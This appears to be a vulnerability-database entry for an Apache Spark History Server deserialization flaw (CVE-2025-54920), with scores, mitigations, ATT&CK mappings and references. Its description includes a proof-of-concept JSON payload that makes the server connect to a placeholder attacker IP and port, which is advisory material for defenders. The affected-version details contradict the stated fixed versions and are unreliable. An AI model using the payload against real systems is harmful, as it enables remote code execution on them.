CVE-2025-54920

HighPublic PoC

Published: 16 March 2026

Published

16 March 2026

Modified

20 March 2026

KEV Added

—

Patch

—

CVSS Score 8.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS Score 0.0054 67.7th percentile

Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Description

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark…

History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

Mitigating Controls (NIST 800-53 r5)AI

SI-2 Flaw Remediation good match

prevent

Directly mitigates the vulnerability by requiring timely patching and upgrading of Apache Spark to versions 3.5.7 or 4.0.1 that fix the insecure Jackson deserialization.

AC-6 Least Privilege good match

prevent

Enforces least privilege to restrict write access to the Spark event logs directory, preventing attackers from injecting malicious JSON payloads.

SI-10 Information Input Validation partial match

prevent

Requires validation of event log JSON inputs to block or reject malformed payloads exploiting polymorphic deserialization of SparkListenerEvent objects.

Security SummaryAI

CVE-2025-54920 is a code execution vulnerability in the Spark History Web UI of Apache Spark versions before 3.5.7 and 4.0.1. It stems from overly permissive Jackson polymorphic deserialization of event log data using @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects. This allows attackers to specify arbitrary class names in event JSON, leading to instantiation of unintended classes during deserialization by the Spark History Server.

An attacker with write access to the Spark event logs directory can exploit this by injecting crafted JSON payloads into event log files. When the Spark History Server starts up or loads these logs, it deserializes the malicious content, enabling actions such as forcing a JDBC connection to an attacker-controlled server via classes like org.apache.hive.jdbc.HiveConnection. This results in arbitrary code execution on the host running the History Server, with a CVSS score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and association to CWE-502.

Apache Spark advisories recommend upgrading to version 3.5.7 or 4.0.1 and above to mitigate the issue, as these versions address the deserialization flaw. Relevant patches and discussions are detailed in GitHub pull requests #51312 and #51323, JIRA ticket SPARK-52381, and announcements on Apache mailing lists and oss-security.

Details

CWE(s): CWE-502

Affected Products

apache

spark

4.0.0, 4.0.1 · ≤ 3.5.7

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

attack.mitre.org →

T1068 Exploitation for Privilege Escalation Privilege Escalation

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges.

attack.mitre.org →

T1210 Exploitation of Remote Services Lateral Movement

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.

attack.mitre.org →

T1505 Server Software Component Persistence

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems.

attack.mitre.org →

Why these techniques?

Vulnerability enables arbitrary RCE via deserialization in Spark History Web UI/server when loading event logs, directly facilitating exploitation of public-facing web application (T1190), remote services (T1210), server software components (T1505), and privilege escalation from low-priv access (T1068).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

References

https://github.com/apache/spark/pull/51312
Issue Tracking · security@apache.org
https://github.com/apache/spark/pull/51323
Issue Tracking · security@apache.org
https://issues.apache.org/jira/browse/SPARK-52381
Issue Tracking · security@apache.org
https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s
Mitigation, Vendor Advisory, Exploit · security@apache.org
http://www.openwall.com/lists/oss-security/2026/03/13/4
Mailing List, Third Party Advisory, Exploit · af854a3a-2127-422b-91ae-364da2661108